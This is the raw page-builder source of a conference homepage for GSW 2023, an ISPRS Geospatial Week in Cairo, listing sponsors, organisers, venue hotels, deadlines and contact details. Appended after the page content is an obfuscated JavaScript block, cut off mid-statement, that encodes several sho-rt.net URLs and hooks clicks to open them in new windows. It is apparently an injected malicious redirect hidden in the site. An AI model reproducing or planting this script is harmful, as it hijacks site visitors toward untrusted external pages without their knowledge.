href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609238799{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1685791591251{margin-top: 260px !important;}\"]</p>\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2271\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png\" alt=\"\" width=\"105\" height=\"104\" /></p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791357227{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong><img class=\"alignnone wp-image-4613\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"80\" height=\"106\" /></strong></span></h4>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791546373{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><img class=\"alignnone wp-image-2272\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"106\" height=\"106\" /></span></h4>\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"40\" bg_override=\"ex-full\"][vc_column width=\"1/2\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317489572{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 